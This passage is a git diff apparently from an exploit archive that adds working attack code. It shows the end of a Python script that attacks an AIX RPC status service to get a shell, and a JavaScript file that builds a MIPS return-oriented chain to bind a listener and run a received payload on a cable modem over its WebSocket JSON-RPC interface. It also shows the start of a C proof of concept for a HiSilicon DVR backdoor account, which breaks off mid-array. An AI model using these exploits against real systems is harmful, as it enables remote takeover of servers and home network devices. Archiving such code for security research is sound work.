+	cred_body = getCredLoopbackBody()
+	cred_len = pack('>I', len(cred_body))
+
+	return cred_flavor + cred_len + cred_body
+
+def getAuthNone():
+	auth_flavor = pack('>I', 0) # AUTH_NONE
+
+	auth_len = pack('>I', 0)
+
+	return auth_flavor + auth_len
+
+def getMessage(prog_num, ver_num, proc_num, use_loopback_cred):
+	xid = urandom(4)
+
+	mtype = pack('>I', 0) # CALL
+
+	rpcvers = pack('>I', 2)
+
+	prog = pack('>I', prog_num)
+	vers = pack('>I', ver_num)
+
+	proc = pack('>I', proc_num)
+
+	cred = ( getCredLoopback() if use_loopback_cred else getAuthNone() )
+
+	verf = getAuthNone()
+
+	return xid + mtype + rpcvers + prog + vers + proc + cred + verf
+
+def getPacket(message):
+	# MSB on = this is the last fragment
+	# LSBs = fragment length
+	frag = pack('>I', len(message) + 0x80000000)
+
+	return frag + message
+
+if len(argv) < 7:
+	print 'Usage: ebbshave-aixgeneric-v1.py rhost lhost lport gid_base execl_func execl_toc'
+	exit(1)
+
+rhost = argv[1]
+lhost = argv[2]
+lport = argv[3]
+gid_base = int(argv[4], 16)
+execl_func = int(argv[5], 16)
+execl_toc = int(argv[6], 16)
+
+# Query the portmapper for services
+
+services = []
+
+s = socket(AF_INET, SOCK_STREAM)
+s.connect((rhost, 111)) # port 111 for portmapper
+s.send(getPacket(getMessage(
+	100000,	# portmapper
+	2,	# version 2
+	4,	# DUMP
+	False	# unauth request
+	)))
+
+s.recv(0x1c) # skip over fragment length, XID, message type, reply state, verifier, accept state
+
+while list(unpack('>I', s.recv(4)))[0]: # while next "value follows" field is true
+	prog_num, ver_num, proto_num, port = unpack('>IIII', s.recv(16))
+	if (prog_num == 100024 # status
+		and proto_num == 6): # TCP
+			print '[ ] Found service ' + str(prog_num) + ' v' + str(ver_num) + ' on TCP port ' + str(port)
+			services.append((prog_num, ver_num, port))
+
+s.close()
+
+# Try attacking
+
+for service in services:
+	prog_num, ver_num, port = service
+
+	serv_str = str(prog_num) + ' v' + str(ver_num)
+
+	for attack in [False, True]:
+		sleep(1) # be gentle
+
+		print '[ ] ' + ( 'Attacking' if attack else 'Pinging' ) + ' ' + serv_str
+
+		s = socket(AF_INET, SOCK_STREAM)
+		s.connect((rhost, port))
+
+		resp_len = 0
+
+		s.send(getPacket(getMessage(
+			prog_num,
+			ver_num,
+			0,	# NULL, acts like a ping
+			attack
+			)))
+
+		s.settimeout(5) # give inetd/... a chance to spin up the service if needed
+
+		try:
+			resp_len = len( s.recv(1024) ) # try to receive up to 1024 bytes
+		except:
+			resp_len = 0 # typically either timeout, connection error, or Ctrl+C
+
+		try:
+			s.close() # try closing the connection if it isn't already dead
+		except:
+			pass # connection is probably already dead
+
+		print '[ ] Got response length ' + str(resp_len)
+
+		if resp_len == 0: # suspect the service either timed out or crashed
+			if attack:
+				print '[+] Probably vulnerable to EBBSHAVE, hopefully you have a shell'
+			else:
+				print '[-] Service probably down or otherwise misbehaving, skipping...'
+				break
\ No newline at end of file
diff --git a/exploits/hardware/remote/47936.js b/exploits/hardware/remote/47936.js
new file mode 100644
index 000000000..19621f8ef
--- /dev/null
+++ b/exploits/hardware/remote/47936.js
@@ -0,0 +1,431 @@
+// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47936.zip
+
+function buf2hex(buffer) { // buffer is an ArrayBuffer
+    return Array.prototype.map.call(new Uint8Array(buffer), x => ('00' + x.toString(16)).slice(-2)).join('');
+}
+
+function insertAt(arr, index, toInsert) {
+    for(let i = 0; i < toInsert.length; i++) {
+        arr[i+index]= toInsert[i];
+    }
+}
+
+function testEqual(buf1, buf2)
+{
+    if (buf1.byteLength != buf2.byteLength) return false;
+    var dv1 = new Int8Array(buf1);
+    var dv2 = new Int8Array(buf2);
+    for (var i = 0 ; i != buf1.byteLength ; i++)
+    {
+        if (dv1[i] != dv2[i]) return false;
+    }
+    return true;
+}
+
+arr = new Uint8Array(0xd00);
+
+arr.fill(0x41)
+
+firstSp = 0x00
+previousSp = firstSp
+sp = previousSp+0xa0
+insertAt(arr, previousSp+0x84-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
+insertAt(arr, previousSp+0x94-1, [0xf2, 0x80, 0x80, 0xa8, 0x64]) 
+// 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;
+
+previousSp = sp
+sp = previousSp+0x20
+insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54]) 
+//0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp-1, [0xc2, 0x80, 0x14, 0x27, 0x10]) 
+//0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp-1, [0xf2, 0x80, 0x8a, 0x89, 0x7c])
+insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
+//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; 
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])
+//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;
+
+previousSp = sp
+sp = previousSp+0x30
+insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
+//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+//call Socket
+
+//0x80a05b20
+socketAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x20]
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, sp-1, socketAddr) //set s0 = socketAddr
+insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
+insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+previousSp = sp
+sp = previousSp+0x80
+insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])
+//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
+
+//0x80a05a30;
+serverAddr = [0xe2, 0x80, 0xa0, 0x5a, 0x30];
+
+previousSp = sp
+sp = previousSp+0x20
+insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr
+insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+previousSp = sp
+sp = previousSp + 0x80
+insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x48, 0x71, 0x6c])
+//0x8048716c: move $a0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp + 0x10
+insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x87, 0x9e, 0x68])
+//0x80879e68: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp + 0x10
+insertAt(arr, previousSp-1, [0xe2, 0x80, 0x83, 0xd9, 0xb8])
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18])
+//0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
+//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; 
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44])
+//0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
+//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+//call memset
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, sp, [0x41, 0x2, 0x5, 0x39]) //set s0 = port
+insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
+insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+// previousSp = sp
+// sp = previousSp+0x10
+// insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
+// //0x80787f64: jalr $s5; nop;
+
+previousSp = sp
+sp = previousSp+0x80
+insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
+//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; 
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr
+insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+previousSp = sp
+sp = previousSp+0x80
+insertAt(arr, sp-1, socketAddr)
+insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])
+//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
+//store port
+
+// previousSp = sp
+// sp = previousSp+0x20
+// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
+// //0x80787f64: jalr $s5; nop;
+
+socketAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x1c]
+
+previousSp = sp
+sp = previousSp+0x20
+insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
+insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+previousSp = sp
+sp = previousSp+0x80
+insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
+//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
+//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, sp+0x4-1, serverAddr) //set s1 = server
+insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+previousSp = sp
+sp = previousSp+0x80
+insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8])
+//0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp + 0x10
+insertAt(arr, previousSp-1, [0xe2, 0x80, 0x8a, 0x62, 0x4c])
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18])
+//0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
+//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; 
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44])
+//0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
+//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+//call bind
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
+insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+previousSp = sp
+sp = previousSp+0x80
+insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
+//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
+//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54]) 
+//0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x91, 0x20]) //set s0 = listen - 0x
+insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+previousSp = sp
+sp = previousSp+0x80
+insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
+//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; 
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])
+//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;
+
+previousSp = sp
+sp = previousSp+0x30
+insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
+//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+//call listen
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4
+insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+previousSp = sp
+sp = previousSp+0x80
+insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
+//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
+//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp-1, [0xc2, 0x80, 0x8, 0x40, 0x8])
+//0x80084008: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, sp-1, [0xe2, 0x80, 0x8a, 0xd8, 0x84]) //set s0 = accept
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x14, 0x27, 0x10])
+//0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
+//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; 
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
+//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+//call accept
+
+//0x80a05b24
+clientAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x24]
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, sp-1, clientAddr) //set s0 = clientAddr
+insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
+insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+previousSp = sp
+sp = previousSp+0x80
+insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20])
+//0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
+
+
+// previousSp = sp
+// sp = previousSp+0x20
+// insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
+// //0x80787f64: jalr $s5; nop;
+
+clientAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x20]
+
+previousSp = sp
+sp = previousSp+0x20
+insertAt(arr, sp-1, clientAddrM4) //set s0 = clientAddr - 4
+insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+previousSp = sp
+sp = previousSp+0x80
+insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30])
+//0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c])
+//0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp-1, [0xc2, 0x80, 0x4c, 0x10, 0x38])
+//0x804c1038: addiu $a2, $zero, 0x400; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+//0x80a05c30
+payloadAddr = [0xe2, 0x80, 0xa0, 0x5c, 0x30]
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, sp+0x4-1, payloadAddr) //set s1 = payload
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+previousSp = sp
+sp = previousSp+0x80
+insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8])
+//0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x46, 0x73, 0x68])
+//0x80467368: move $a3, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x93, 0x3c]) //set s0 = recv - 0x
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+previousSp = sp
+sp = previousSp+0x80
+insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
+//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; 
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78])
+//0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;
+
+previousSp = sp
+sp = previousSp+0x30
+insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
+//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+//call recv
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x4-1, [0xf2, 0x80, 0x80, 0xa8, 0x64]) 
+// 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;
+
+previousSp = sp
+sp = previousSp+0x20
+insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x12, 0x3b, 0x7c])
+//0x80123b7c: addiu $a0, $a0, 4; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0xab, 0x5c]) //set s0 = sleep
+insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+previousSp = sp
+sp = previousSp+0x80
+insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
+//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; 
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
+//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+//call sleep
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, sp-1, payloadAddr) //set s0 = payload
+insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc])
+//0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;
+
+previousSp = sp
+sp = previousSp+0x80
+insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40])
+//0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; 
+
+previousSp = sp
+sp = previousSp+0x10
+insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c])
+//0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
+
+var string = new TextDecoder("utf-8").decode(arr);
+
+var newArr = new TextEncoder("utf-8").encode(string);
+
+console.log(buf2hex(newArr));
+
+exploit = '{"jsonrpc":"2.0","method":"Frontend::GetFrontendSpectrumData","params":{"coreID":0,"fStartHz":' + string + ',"fStopHz":1000000000,"fftSize":1024,"gain":1},"id":"0"}'
+console.log(exploit)
+
+console.log(testEqual(arr, newArr));
+
+var socket = new WebSocket("ws://spectrum:spectrum@192.168.100.1:6080/Frontend", 'rpc-frontend')
+
+socket.onopen = function(e) {
+    socket.send(exploit)
+    fetch('/payload')
+};
\ No newline at end of file
diff --git a/exploits/hardware/remote/48004.c b/exploits/hardware/remote/48004.c
new file mode 100644
index 000000000..5505ef6e5
--- /dev/null
+++ b/exploits/hardware/remote/48004.c
@@ -0,0 +1,458 @@
+# Exploit Title: HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account 
+# Dork: N/A
+# Date: 2020-02-03
+# Exploit Author: Snawoot
+# Vendor Homepage: http://www.hisilicon.com
+# Product Link: http://www.hisilicon.com/en/Products
+# Version: hi3520d
+# Tested on: Linux
+# CVE: N/A
+# References: https://habr.com/en/post/486856/
+# References: https://github.com/Snawoot/hisilicon-dvr-telnet
+# References: https://github.com/tothi/pwn-hisilicon-dvr#summary
+
+# POC: 
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+#include <netdb.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <sys/socket.h>
+#include <unistd.h>
+
+typedef unsigned char byte;
+typedef unsigned int uint;
+
+byte state[2048] = {0};
+byte datum[] = {
+    0x20, 0x01, 0x02, 0x03, 0x04, 0x05, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09,
+    0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11,
+    0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19,
+    0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x01,
+    0x0e, 0x04, 0x0d, 0x01, 0x02, 0x0f, 0x0b, 0x08, 0x03, 0x0a, 0x06, 0x0c,
+    0x05, 0x09, 0x00, 0x07, 0x00, 0x0f, 0x07, 0x04, 0x0e, 0x02, 0x0d, 0x01,
+    0x0a, 0x06, 0x0c, 0x0b, 0x09, 0x05, 0x03, 0x08, 0x04, 0x01, 0x0e, 0x08,
+    0x0d, 0x06, 0x02, 0x0b, 0x0f, 0x0c, 0x09, 0x07, 0x03, 0x0a, 0x05, 0x00,
+    0x0f, 0x0c, 0x08, 0x02, 0x04, 0x09, 0x01, 0x07, 0x05, 0x0b, 0x03, 0x0e,
+    0x0a, 0x00, 0x06, 0x0d, 0x0f, 0x01, 0x08, 0x0e, 0x06, 0x0b, 0x03, 0x04,
+    0x09, 0x07, 0x02, 0x0d, 0x0c, 0x00, 0x05, 0x0a, 0x03, 0x0d, 0x04, 0x07,
+    0x0f, 0x02, 0x08, 0x0e, 0x0c, 0x00, 0x01, 0x0a, 0x06, 0x09, 0x0b, 0x05,
+    0x00, 0x0e, 0x07, 0x0b, 0x0a, 0x04, 0x0d, 0x01, 0x05, 0x08, 0x0c, 0x06,
+    0x09, 0x03, 0x02, 0x0f, 0x0d, 0x08, 0x0a, 0x01, 0x03, 0x0f, 0x04, 0x02,
+    0x0b, 0x06, 0x07, 0x0c, 0x00, 0x05, 0x0e, 0x09, 0x0a, 0x00, 0x09, 0x0e,
+    0x06, 0x03, 0x0f, 0x05, 0x01, 0x0d, 0x0c, 0x07, 0x0b, 0x04, 0x02, 0x08,
+    0x0d, 0x07, 0x00, 0x09, 0x03, 0x04, 0x06, 0x0a, 0x02, 0x08, 0x05, 0x0e,
+    0x0c, 0x0b, 0x0f, 0x01, 0x0d, 0x06, 0x04, 0x09, 0x08, 0x0f, 0x03, 0x00,
